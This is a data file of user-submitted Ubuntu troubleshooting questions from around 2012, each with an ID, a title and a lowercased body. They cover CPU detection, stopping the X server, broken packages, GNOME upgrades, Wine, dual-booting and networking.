116757	ubuntu server 11.04 recognize only 1 core instead of 4	i searched for other questions and googled a lot but i did n't find a solution for solving this problem . i have ubuntu server 11.04 64bit installed on my dell poweredge with intel xeon x5450 . the server only recognizes 1 of the 4 cores i have . i tried to modify the grub config but it did n't work . in the machine bios i did n't find anything useful . cpu root @ darwin : ~ # cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) xeon ( r ) cpu x5450 @ 3.00ghz stepping : 10 cpu mhz : 2992.180 cache size : 6144 kb physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm dts tpr_shadow vnmi flexpriority bogomips : 5984.36 clflush size : 64 cache_alignment : 64 address sizes : 38 bits physical , 48 bits virtual power management : grub root @ darwin : ~ # cat /etc/default/grub # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=2 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' '' grub_cmdline_linux= '' noapic nolapic '' # was with acpi=off # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' complete dmesg too long , posted on pastebin http : //pastebin.com/bskpbhzu lshw -class cpu *-cpu:0 description : cpu product : intel ( r ) xeon ( r ) cpu x5450 @ 3.00ghz vendor : intel corp. physical id : 400 bus info : cpu @ 0 version : intel ( r ) xeon ( r ) cpu x5450 @ 3.00ghz slot : cpu1 size : 3ghz capacity : 3600mhz width : 64 bits clock : 1333mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority configuration : cores=4 enabledcores=4 threads=4 *-cpu:1 disabled description : cpu [ empty ] vendor : intel physical id : 401 slot : cpu2 capabilities : x86-64 ca n't figure out . this last command shows that the cores are 4 and are all enabled . the top command after pressing 1 shows me only cpu0 .
116758	how to install gopenvpn ?	how do i install gopenvpn and configure it in ubuntu 11.10 x64 ? i managed to build it from source code , but when i start it i get the following no openvpn configuration files were found in /etc/openvpn
116761	how do i stop or turn off the x-server ?	i 'm trying to do this tutorial : installing cuda under ubuntu 10.04 i need the command that would completely stop/turn off the x-server . when i try to install the nvidia developer driver , i get a blue screen telling me error : cant install with x-server running , please turn it off ( something like that ) sudo service gdm stop worked at the time i guess , ( didnt give any errors ) but the x-server is still running . is this the command i should be using ?
116766	how to update gnome to 3.4 ?	i read about release new gnome 3.4 . how to update from gnome 3.2 ( upgrade manager does not tell me about the new update when check ) .
116767	acer touchpad multitouch not working	i tried to get my acer laptop 's touchpad working properly . i installed driver package ( psmouse-alps-dkms_0.10_all ) which made the side scrolling working . however , the touchpad supports multitouch ( works on windows ) , but synaptiks claims that only 1 finger is detected by the touchpad . thus 2 finger scrolling , pinch & pan zoom and those are not working . any ideas how i could get these multi-finger gestures working ?
116768	providing a customized config file for another package	we use ubuntu at work and i will need to make the same configuration changes to many systems so i am packaging these . one of the configuration changes i need to make is setting lightdm to autologin . for me to package this change it seems i will need to clobber the existing /etc/lightdm/lightdm.conf and replace it with the my customized lightdm.conf . this seems like a bad idea . how can i do this in a way that is wo n't cause breakage and is inline with how the rest of the community is working ?
116771	virtualbox virtual networking ( macosx host , ubuntu 11.04 guest )	i would like my ubuntu guest to have 2 interfaces : eth0 : set up with nat and accessing the internet eth1 : set up with `` host-only networking '' , static ip , providing services to my macosx host i was able to do this with a previous version of ubuntu but i ca n't with this setup . could anybody recommend a step-by-step guide on how to do this , please ? update : this was due to decnet changing the mac address of all interfaces to `` aa:00:04:00:0a:08 '' . : - (
116778	need for gksudo for `` install new software '' in eclipse	i have been developing for android on eclipse for a while now , and my experience with the eclipse environment on ubuntu10.10 has not been a smooth one . with the repo install of eclipse i have had to sudo eclipse to install the required components for android development . ( a big red flag for me ) i tried today to install updates for the eclipse and android platform and my eclipse installation seems to have broken horribly . i can no longer find and of the urls for new software if i gksudo it , if i run it in user mode it fails ( as it always has ) with permissions problems . i have chowned user : user all my eclipse and android related private/user files . this is a system running ubuntu 10.10 with gnome2.x . on my kubuntu 11.10 install it work a lot better . is there an easy fix to this ? is the repo version of eclipse broken ? should i do a clean install for just my user ? ( if so can i retain my previously installed software ? the installation process is very time consuming ) i saw there was a previous post here recommending this for new installations .
116782	why do fonts look horrible in any java application ?	all fonts in java applications look horrible . i have seen a few questions about this previously , but they are quite old now ( 11.04 was the most recent , but that did n't seem to be the same problem ) . for some reason java applications do not use the system font ( ubuntu 11 ) , but rather some elongated font that does n't seem to have any anti-aliasing . so what i 'm asking is if this is an open bug ( could n't find any on launchpad ) , something the developers have done wrong , or if there is a way to configure the fonts used in java application . perhaps this is just a shortcoming of openjdk and i should install the sun/oracle version instead ? following is an image of jitsi , but the problem is also present in minecraft , my internet-bank and anything else involving java . i 'm on 12.04 , but since i could n't find anything on launchpad i 'm assuming that is n't relevant .
116785	are there any data migration tools ?	i 'm trying to migrate a laptop 's hdd to another hdd . i 'm trying to find a way to use ubuntu live usb with persistence and run tools such as this ! i tried disc copy bootable linux distro , did n't work . any help would be great !
116787	how to turn off/on the laptop screen using a command-line or shell-scipt ?	in my laptop i have a button to turn off screen , but it did n't work so i think if i bind it 's function and add a command-line to it as if i press it the screen will be turned off and if i press it again it will be turned on.so how to do it , and what it the command line to turn off/on the screen ( monitor ) ?
116788	ca n't fix broken packages	i am too dumb but determined to use ubuntu that i paid a professional to install it for me ( dualboot 11.10 with win7 ) . when i came home i got a lot of things from the software center . skype did not have a download button so i googled it and ubuntu help told me to do this : sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner '' and then this : sudo apt-get update & & sudo apt-get install skype the terminal told me `` that this is potentially harmful ... '' but i thought it was ubuntu language meaning `` are you sure ? '' now the computer is mute . items can not be installed or removed until the package catalog is repaired , so i want to repair it but the package operation fails . `` sudo aptitude -f install '' - > command not found synaptic package manager tells me that i have two broken packages , libc6 and libc6-dev so i do this : sudo apt-get update & & sudo apt-get upgrade which tells me to do this : sudo apt-get -f install that ends up like this : ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . preconfiguring packages ... dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : sub-process /usr/bin/dpkg returned an error code ( 2 ) when fixing broken packages in synaptic package manager i get this : preconfiguring packages ... dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : sub-process /usr/bin/dpkg returned an error code ( 2 ) a package failed to install . trying to recover : dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . i want to become a linux geek but it is harder than i thought . please help !
116789	old canon smartbase mpc 200 all in one	how can install into ubuntu 10.10 the old canon smartbase mpc 200 all in one drivers for printer and scanner ?
116790	how do i make music sync with ios 5 in ubuntu 11.10 work ?	i 've tried several tutorials on the internet but nothing works . this is not a duplicate , it is true that there are several of them about ios5 but not one of them asks specifically about music syncing or ubuntu oneiric ocelot . my ipod classic syncs just fine with banshee but my ipad 2 wo n't . i looked around and saw that an unstable libimobiledevice-1.1.2 was available , but i ca n't manage to install it .
116791	why do i have trouble downloading add-ons for firefox ?	i get the error message : there was an error downloading . i am using lucid lynx and firefox 11 . two of the add-ons in question are easy youtube dowloader and flas video downloader .
116794	how do i find and delete duplicate music tracks ?	my issue is that for some reason i have duplicates of some music tracks . however they are not named identically . for instance : music/prefuse 73/one word extinguisher/07 . detchibe.mp3 & music/prefuse 73/one word extinguisher/07 - detchibe.mp3 notice they are duplicate songs but the 07* . * & the 07 - is tricking duplicate file finders that search based on file names .
116795	problem after upgrade to gnome shell 3.4 ( ubuntu 11.10 )	i updated the gnome shell by these points : sudo add-apt-repository ppa : ricotz/testing sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update & & sudo apt-get dist-upgrade sudo apt-get install gnome-shell unfortunately , no longer work themes and extensions . how can i fix it ( or return to the previous version ) ? regards and i hope to help . edit : i noticed that i can not update gnome-shell-extension-common
116801	is there a way to get a workspace grid in gnome 3.x ?	is there any setting/plugin/hack/workaround that will allow me to run ubuntu with the gnome 3.x/gnome shell desktop while retaining a 2x2 or n x m workspace grid instead of the default gnome one-dimensional line-up of workspaces ?
116802	hidden files in nautilus after extracting iso	i extracted the information from an iso image and from nautilus i could only see two folders , but from the terminal i can see the rest of the files and folders . these folders do not have the . character in from of them to hide them from plain sight . when i try to `` show hidden files '' in nautilus , nautilus closes/crashes itself and it does not show the hidden folders or files . somehow they are hidden without using the normal dot in the beginning of the filename . they have my user permission , but no way of seeing them from within nautilus . i can interact with them , but the fact that they appear hidden when i can see them inside the iso and after extracting them they disappear is what confuses me . what permission or setting makes this folders appear hidden and does not let nautilus show them and like i said before , trying to show them with the `` show hidden files '' option crashes nautilus and exits it , forcing me to have to open nautilus again from the launcher .
116803	how do i partition my windows hard drive ?	i want to partition the hard drive on my windows computer and run ubuntu under that partition . how can i go about doing this ?
116805	is possible to create a launcher that open bash terminal with focus on a specific folder ?	as a title , or in other words is possible assign in bash launcher a custom .bashrc ?
116817	how do i clear the smb credential cache ?	i used smbclient [ ... ] -u once , and i entered some network credentials . now when i browse the server with thunar ( xfce file manager ) , it remembers the credentials i entered . how can i make the computer forget every username/domain/password i ever entered ? xubuntu 11.10 , most recent samba/everything updates .
116822	why ca n't i get gdm to stop ?	im been trying to stop this x-server here on ubuntu 10.04. i have done : sudo /etc/init.d/gdm stop ( doesnt do anything really ) sudo service gdm stop ( stop : unknown instance ) sudo stop gdm ( stop : unknown instance ) this is driving me crazy ... i cant seem to find anything else to stop it , and i cant find if its a bug or not . sudo /etc/init.d/gdm stop ( only stats that i should do `` sudo service gdm stop : ) this is all from the ctrl + alt + f1 virtual interface some call it . ( a command line ) i have been on this for days ( 3 ) , i really need advise please ! !
116823	how can i diagnose what process is using cpu time ?	it 's a `` problem '' that i have since 11.10 , now i 've upgraded to 12.04 ( fresh install ) . even while ondemand governor is set , and the computer is idle , fan goes on and does n't want to shut down . images below : cpu processes
116827	missing firefox app icon	i 'm using ubuntu 11.04 ( upgraded from lts 10.04 ) and firefox ( version 11 ) does n't show it 's icon in the window list panel , in the firefox window top left corner ( system menu ) nor when using alt+tab to switch applications . i 'm using unity 2d since i 'm running ubuntu as a guest in a vmware virtual machine ( host is windows 7 ) instead of the firefox icon i get what appears to be a generic icon that looks like an app window in the window list and a black rectangle with a curl in the bottom right corner in the alt+tab window . how do i fix this so that the proper firefox icon gets displayed ? edit : depending on the icon set chosen in the appearence settings window sometimes i get the icon , sometimes i do n't . when using ubuntu classic none of the icon sets provide the icon for firefox . edit : i tried creating a new profile , did n't help . also , if i run firefox from a terminal ( using ubuntu classic ) , i get the following message 'failed to create drawable ' and the browser does show up the proper icon . is there a way what drawable failed ? the message shows up even if i only bring up the command line parameters help ( firefox -h ) , altho it shows in the middle of the output .
116830	how to return to the gui ?	i am very new to linux and ubuntu . i use ubuntu 11.10 . i was trying to exit the x server ( in order to install some nvidia drivers ) and i typed in the terminal : sudo service lightdm stop how can i return to the ubuntu interface ?
116837	sudo ./ : command not found	http : //youtu.be/8oytrf9jngk for a video i made of it in action . n.b . - i have my nvidia .run file on my desktop - i double click it , and it appears to run but stops asking for sudo permissions . so i open a terminal and attempt to run it via a sudo sh [ file ] and sudo ./ [ file ] but both give file not found if you can help fix this ? then please do !
116841	is there a security risk if a password can be reset easily ?	was just reading up on changing password complexity and i stumbled upon this : https : //help.ubuntu.com/11.04/ubuntu-help/user-forgottenpassword.html is n't that a big security risk ? assuming someone gets a hold of the physical box/laptop ? i know with windows there is a requirement for using a password reset disk . but , i assume if anyone gets a hold of an hdd/ssd they can read the info on it assuming the file system has n't been encrypted . but this , even with encryption , seems that anyone can reset the password for the system if they are at the terminal .
116844	how to diagnose ubuntu cpu spikes / io wait ?	i 'm using ubuntu and every couple minutes it goes unresponsive for a half second to a full second , which is n't normally a problem but makes trying to code extremely frustrating when your trying to hit backspace or navigate the code and nothing is happening . the problem is , the freezes are so brief that top does n't have time to show me what is spiking the cpu ( assuming something is , but i do n't know what else could cause this ) . does anyone know how to troubleshoot this performance issue ? edit : i 've tried login in with gnome classic ( no effects ) instead of unity but it still freezes up every once in awhile . edit : the cpu graph does n't seem to be showing any actual spikes so it seems you were right and my original diagnosis of cpu spikes being the problem was incorrect , i now suspect io wait . i do n't recall this happening for the brief few weeks i had windows 7 starter running on it though , which leads me to believe it is n't ( just ? ) the hardware.. is there anything i can tweak to improve this ? i 'm using an acer aspire one d257 , with ubuntu 11.10 . edit : output of dmesg is at http : //paste.ubuntu.com/1060054/ and kern.log is at http : //paste.ubuntu.com/1060055/
116850	how do i install latest eclipse indigo in ubuntu 11.10	i 'm now using eclipse 3.7.0 from ubuntu software center but there 's no option in update manager or usc to upgrade latest version indigo sr2 . previously , i tried to search ppa from launchpad but eclipse team had not continued yet since jaunty released can i get any ppas ? and how do i install latest eclipse indigo in ubuntu 11.10 ?
116851	how to install ktechlab ?	how to install ktechlab in ubuntu 11.10 ?
116861	setting up a network between a host and guest virtual machine	( i 'm running ubuntu server 12.04 on virtual box ) i 'm trying to transfer a file ( scp ) from my laptop to one of the directories of a virtual machine . i tried sharing folders , but that failed . i 'm a bit of a networking newbie . i 've looked at like 20-30 pages . here 's one : http : //www.howtoforge.com/moving-files-between-linux-systems-with-scp i followed those steps exactly . my problem is that when i try using scp , it just hangs . i 'm also not sure which network interface to configure ( eth0 , eth1 ? ) in the guest os . another ( significant ? ) detail is that the inet address of eth0 is 10.0.2.15 instead of something like 192.168.x.y . i 've enabled the bridge adapter and the host-only adapter . both the laptop and guest vm have openssh-server installed . i 'm not sure what to do at this point . is there a better place to ask about this ?
116865	attempting to change keyboard backlight levels changes theme	i 'm using an asus g74sx on ubuntu 12.04 . when i try to change my keyboard backlight levels my theme seems to change or crash to a backup . p.s . my screen brightness wo n't change if i use the keys or even going into display settings manually . p.s.s i 'll be able to post a screen shot when my reputation gets up to 10 it changes to this : from this ( note : the normal theme is the window surrounding the picture ) :
116868	how can i tell if zrtp is enabled in a twinkle sip call ?	i recently attended a talk about gnu telephony . i was informed that twinkle supports zrtp for encrypted sip calls . i went into edit > user profile > security and made sure that zrtp was enables and that all boxes were checked . i asked a friend to do the same and then we called each other . there is no immediate indication that i can see that the call is secure . how can i tell if zrtp is enabled in a twinkle sip call ?
116872	how can i create an ad-hoc connection that looks like a wifi connection from a router ?	i have a vizio tablet ( running a modified version of android 2.3.2 ) which , for some reason or another , refuses to list windows ad-hoc wifi connections on it 's wifi connection screen . it can connect to wifi networks served from a normal router , but the wireless bit of my home router is broken , so i 'd like to share the internet connection through my laptop 's wifi card until the new router arrives . is it possible to create an ad-hoc network in ubuntu that looks like a normal wireless network to my tablet ?
116873	finale or sibelius on ubuntu 11.10 under wine ?	i want to install either finale 2011-2012 or sibelius 5-6-7 on my 11.10 install via wine . before i purchase any of them , does anyone know if they work on wine 1.4 ( or even 1.5 ) on 11.10 ? i 've seen some posts on the winehq about those programs , but they are on older wine releases on older ubuntu releases with older versions of software . also , i 'm not the biggest fan of musescore ... if anyone knows of any native programs for linux that as powerful as finale or sibelius , could anyone let me know ?
116874	i7 processor with 4 core , 8 thread system , how can i reboot ubuntu ?	i have tested ubuntu in i7 , i5 but lower then 4 core/8 thread cpu . in two system which has i7 processor with 4 core/8 thread i have the same problem . after reboot it never reboot itself auto . i need to physically turn it off ( power out ) , and power on . what is the way to reboot for such system ? ( less then 4 core/8 thread cpu its working nicely ) .
116883	ubuntu alongside windows not available , how to install it ?	i am trying to install ubuntu alongside but the option is not available and i have no knowledge to shrink partitions / mess us with dual boot etc . i read somewhere '' i think that you already have 4 primary partitions for windows 7 ( ubuntu can not create its partitions because you can not create more than 4 primary partitions ) and so ubuntu ca n't show you automatically to install along windows 7 . '' now my hd is like this 1- no name 39 mb ( oem partition ) 2- os ( c : ) 80 gb ( boot , page file , crash dump , primary partition ) 3- data ( d : ) 180 gb ( primary partition 4- recovery 15 gb ( system , active , primary partition ) 5- unallocated 20 gb what i tried is to create a partition with the unallocated space but there is a pop up windows telling me that the partition will be dynamics and no os can be installed there , i left it unallocated and from linux is unavailable , plus the option alongside windows is still not available . can someone explain me step by step how to do the alongside installation without go for the dual boot one ? thanks
116885	can i use ubuntu to write a windows 7 iso to usb ?	i need to create a windows installation usb drive from an iso file . i used unetbootin which seems to be the only tool that can write non-linux images . the usb disk boots ( sort of ) , but it gets stuck at the very first stage . a unetbootin splash screen appears that keeps counting down from 10 to 0 , and then restarts . the screen looks like this : is there a way to make windows boot from a usb image created on linux ?
116892	wubi install stuck at purple screen	well , i installed ubuntu 11.10 via wubi on my msi u270 . everything was running fine , i even got fglrx working after i manually downloaded a .run and executed it . then i thought of running the complete updates that were on the update manager . i did run it , it took a whole night to complete , i waited a bit as the part came where i had to click on `` restart now '' . i clicked it , after that i 'm stuck at the purple screen with all dots lighted orange . i 've been waiting for it to start up for more than half an hour , and there used to be occasional hdd blinks which is n't happening now . should i reboot ? edit : after the restart not while restarting , forgot to mention that and by the way , is there a way to see anything that 's happening just so i know that it ai n't stuck ?
116896	ubuntu openvpn multiple networks	good day ! i need to configure openvpn on server with one ip ( 213.11.23.155 , vpn.example.com ) for multiple networks , for example : network 1 computers : 125.16.1.1 125.16.1.2 network 2 computers : 125.16.2.1 125.16.2.2 125.16.2.3 etc ... i need an advice on how to do that .
116898	i do n't want to manually turn on my wireless everytime computer starts up	how can i have this switched to on automatically when i log in ? when i startup my machine , that thing is switched off and i have to manually switch it on before i can use the internet . i ca n't see any setting in there to have it already turned on when computer starts up , the box for connect automatically is checked but that seems more to be about connecting to known wifi points automatically when wifi is on , rather than turning on wifi automatically . ubuntu 11.10 on a asus zenbook ux31e .
116899	how do i move all directories into a single directory efficiently in the same folder ?	i have 100 files in a single folder including a folder called `` target . '' i want to migrate all the files in this folder into the folder target ( except for the target folder itself ) . is there an efficient terminal command to do this ?
116910	plugins not getting updates	i installed many ubuntu on my pc and i could n't even listen to a single music file or watch even a small video , it always says plugins not installed . if it ca n't even those small plugins then whast is the purpose of that whole dvd of ubuntu ... ? ? and what is the difference between cd and dvd of ubuntu if it ca n't even install any plugin from the ? ?
116912	using ipad as an external monitor	is there a way to use the apple ipad as an external monitor for ubuntu ? i see that there are applications for that purpose for macintosh computers .
116915	music player that remembers last song and playlist	i am looking for something similar to winamp . i have seen other threads but i have tried some solutions and they did not work . i tried banshee that comes with ubuntu 11.10 but it does not open last song . i tried rhythmbox with the remember last song plugin however it does not remember the playlist i got the song from so it would start shuffling all my music . i tried amarok and it does the same thing as banshee except can not even play my playlist and starts playing all my music . i tried audacious but importing my playlist .m3u doesnt allow me to select the individual playlists and play them . i just moved from windows using winamp and would like a music player that can open playlists .m3u and when i open the application later that it opens the last song and playlist and i can press the play hotkey and music will start playing on startup similar to winamp . i do not care about any additional functionality or user interface .
116917	is there anyway to compile notepad++ from source ?	i really like using notepad++ to write html and such . after i started using ubuntu i looked around for an alternative to notpad++ . i found a thread which lead me to try geany and a few others , but i really miss notepad++ . is there anyway i could compile it from the source code to use on ubuntu ? i know its written in c++ . could i just open it in code : :blocks and compile it ? you can get the source here . i would n't mind hearing about other alternatives , but really want to know if compiling it is possible . thanks
116923	is it possible to add registry entries to the wine registry and make illustrator work ?	i have n't done this kind of work before but i really need adobe illustrator to get work on ubuntu ! i do n't care if it is cs3 or 4 . i have installed cs3 and 4 master collection on windows and with wine on ubuntu ca n't run it ( yes , no registry entries added to the wine ! ) i can copy all the needed file to the /home/prasad/.wine/dosdevices/c : directory with hidden files included , but how to add registry entries to them ? ( windows registry editor like thing to wine ) is it possible to make illustrator run in ubuntu like that , i tried to install master collection but it failed number of times . i use ubuntu 10.10
116924	where could one go to suggest new packages for ubuntu	sometimes one finds a package that looks very good and can help in some ways , but the package is not found in the repositories of ubuntu or in any ppa site . apart from creating a ppa , how and where can one suggest a package to be included to ubuntu in a future or present version . some quick examples might be : komodo ( another alternative to notepad++ ) : http : //www.liberiangeek.net/2012/01/komodo-edit-the-best-notepad-alternative-in-ubuntu/ mkahawa ( cafe management system ) : http : //sourceforge.net/projects/mkahawa/ and many others that can help in making users use ubuntu more .
116929	flash update tonight has messed flash up in ubuntu 11.10 ?	i had a flash update tonight and since then my flash is not working correctly.i went to youtube and opened a video fullscreen , when i click 1080 hd on fullscreen the video disappears and goes back to regular size with nothing showing just a blank screen.before this update i had no issues.anyone have an idea what s going on ?
116930	unmet dependencies and broken count > 0 problem	i tried installing fbreader , following all the steps , but ended up with unmet dependencies , i also think a file is referenced in two locations at once and hence killing it.. any ideas how i can fix it ? i 've done alot of research and tried : simon @ simon-studio-1558 : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : dkms patch use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libzlcore0.12 the following new packages will be installed : libzlcore0.12 0 upgraded , 1 newly installed , 0 to remove and 61 not upgraded . 6 not fully installed or removed . need to get 0 b/270 kb of archives . after this operation , 811 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 179860 files and directories currently installed . ) unpacking libzlcore0.12 ( from ... /libzlcore0.12_0.12.10dfsg-4_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libzlcore0.12_0.12.10dfsg-4_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/libzlcore.so.0.12.10 ' , which is also in package libzlcore 0.12.10-1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libzlcore0.12_0.12.10dfsg-4_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sorry for the formatting , but it basically is n't liking : dpkg : error processing /var/cache/apt/archives/libzlcore0.12_0.12.10dfsg-4_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/libzlcore.so.0.12.10 ' , which is also in package libzlcore 0.12.10-1 any ideas ? also i do n't care about keeping the program , but the error is stopping sudo apt-get remove fbreader from working too .
116936	how can i run a unity session inside xephyr ?	i can get xephyr to run single applications within a xephyr window . how can i run an entire unity desktop session within a xephyr window ? ( preferably as another user . ) if i use the gtk-xephyr script with the command gnome-session -- session=ubuntu , i get a black window . if i run compiz i get a grey window . if i do not use the script and just run the following i get a popup in the xephyr window saying `` could not acquire name on session bus . [ log out ] '' and in the terminal `` gnome-session [ 3157 ] : warning : failed to acquire org.gnome.sessionmanager '' . xephyr :8 & display=:8 gnome-session -- session=ubuntu
116937	where can i find the source code of quickly ?	i am looking for the source code of quickly so that i can better understand it and use that knowledge to build my application that interacts with the terminal .
116941	how to reload ubuntu11.04 again which is hidden in the hard disk	i had installed ubuntu 11.04 as another os ( not inside windows ) . means every time i used to get a ubuntu screen and i can select ubuntu or windows . but once i formatted my windows . after that the 38 gb memory which was used under ubuntu is missing means the ubuntu is there and as it is ext type windows is not able to access that . and i am not able to boot into it.i need ubuntu i can install new version but my memory is being wasted i do not kno what to do . pl reply me asap .
116942	any way to manually make a bootable usb from iso ?	i 've been using unetbootin but it occasionally fails to create a bootable usb the way i need it to , especially with the newer versions . is there a way i could extract the iso myself ?
116947	how can i restore windows 7 to the pc	i had windows 7 and installed ubuntu , but i do n't like it , so i 'd like to remove it and back to windows 7. can you tell the steps ?
116960	global installation of composer ( manual )	i followed composer manual ( global installation of composer ( manual ) ) to install composer on ubuntu . $ ll /usr/local/bin/ total 4760 drwxr-xr-x 2 root root 4096 2012-03-29 08:29 ./ drwxr-xr-x 10 root root 4096 2011-04-26 00:50 ../ -rwxr-xr-x 1 root root 410324 2012-03-29 08:28 composer.phar other scripts from /usr/local/bin/ works , but composer gives : $ php composer.phar update could not open input file : composer.phar it works only if i enter absolute path to composer.phar . how to fix this ?
116964	customizing upstart `` restart '' commands	i 'd like to run a different command when upstart is restarting a process than when it is starting a process . in particular , i 'm using thin and i want to do a rolling restart ( built in to thin via a different command ) instead of stopping/starting . is this possible with upstart , or do i need to start looking for a different solution ?
116968	is there an html optimizing command i can access in ubuntu 's bash shell ?	i have a bash shell script that i use to upload a set of html files to a web server . the script makes various changes to the code before it uploads it . one thing i 'd like to do is strip the html code of comments and excess white space . is there a command i can use to do that within the bash script ?
116978	upgrading to gnome 3.4 breaks unity and gnome-shell in 11.10	i have upgraded my gnome shell to 3.4 in ubuntu 11.10 through sudo add-apt-repository ppa : ricotz/testing sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update & & sudo apt-get dist-upgrade sudo apt-get install gnome-shell but it broke my system . gnome shell is completely broken - when i login it just shows desktop wallpaper and nothing else . and importantly unity is also broken . attaching the screenshot some main issues 1 ) two menus are appearing now - global menu as well as application menu 2 ) icons on top-right panel are appearing weirdly 3 ) my default ambiance theme also got screwed . instead of black color menus , i am seeing white color menus . how do i fix them ? or do i have an option to revert back to original settings or will reinstalling unity/gnome shell helps ?
116979	how do i downgrade thunderbird ( or get a working version of lightning )	could somebody please tell me how to roll thunderbird back to 11.x , or get a working version of lightning ( which claims it is incompatible with 12.0 ) . i 'm currently not able to view my calendar : (
116981	can i use the gnome shell built-in screencast tool in unity ?	in gnome shell you can press control+shift+alt+r to start and stop the built-in screencast tool . what is the name of this tool ? is it possible to invoke it from within unity ?
116984	background menu colors	after fiddling around installing themes and icons and stuff , aslo usign the gnome configurator , i now have the background of my top menu white - how do i restore it to the original ubuntu theme color ? alex
116989	ubuntu livecd logged off	a few times the ubuntu livecd logged me out ( the logon screen prompted for a user/password ) when i was using some applications and i had to restart the os . can anyone tell me de default user/password..
116990	can not log off or shutdown in ubuntu 10.10	hey just installed xfce on my ubuntu 10.10 machine . but now i can not log off or shutdown my computer . when i click on log off or shutdown nothing happens ! if i again click on them a dialog box appears saying that : failed to receive a reply from the session manager session manager must be in idle state when requesting a shutdown so how to fix this issue ? ?
116994	how to change default boot with two ubuntus ?	i currently have 11.10 and 12.04 beta running side-by-side . since installing the beta , i am presented with a grub2 menu every time i boot up , which selects 12.04 by default . ( aside : when the 11.10 kernel updated from 3.0.0-16 to 3.0.0-17 this option did not appear in the grub2 menu . ) when i open grub customizer in 11.10 , it shows 11.10 kernel 3.0.0-17 as the default , when i open grub customizer in 12.04 , it shows 12.04 as the default . how can i change grub2 to pick the latest 11.10 kernel as the default ? ( latest means that if 3.0.0-18 is released it will become the default , and so on . ) and also stop displaying the menu ( i only boot into the beta when i have something specific to test ) . generic answers that apply to any two ubuntus running side-by-side are preferred .
116996	how do i encrypt/decrypt file within gedit ?	in the previous version of ubuntu ( eg : maverick , natty ) , i used to do a : sudo apt-get install gedit-plugins seahorse to have the ability to encrypt/decrypt file within gedit after enabling the plugin in the preferences . but since , oneiric i 've not found a way of achieving this . and now that i 'm running precise ( the lts version ! ) , i 'm a bit disappointed of not being able to do such things .
116997	run two shell file with thread	how i can run two file shell in parallel and do not shared the same jvm . may be i use thread but how i run two file shell bu two thread ? file 1 : # ! /bin/bash # # script for running several experimentations one the same jvm # usage : trace_dir nb_expe factories ... # param= '' parameter1 '' another= '' parameter2 '' for ( ( i = 10 ; i > = 0 ; i -= 1 ) ) do echo `` run my file with param another `` done file 2 : # ! /bin/bash # # script for running several experimentations one the same jvm # usage : trace_dir nb_expe factories ... # a= '' 101 '' b= '' 400 '' c= '' 500 '' echo `` run my programme with a b c ``
117002	slow internet connection with mobile broadband	i 'm using a huawei 156g usb stick to connect to the internet . in windows it reacts lightning fast and loads pages faster than my ubuntu 10.10 does , it 's not the connection type ( hsdpa , wcdma or gsm ) it takes more time to connect , download speed seems okay ( but not full speed i think ) what is the matter with it ? do i need to install some kind of drivers for it ? i 'm not behind a proxy . please help , i just searched around ask ubuntu and nothing matched my problem : - (
117003	unable to install from ubuntu software center	everytime i try to download something from ubuntu software center it says ... check your internet connection ... and shows some ppa repository error which i tried to fix but still it pop ups everytime ...
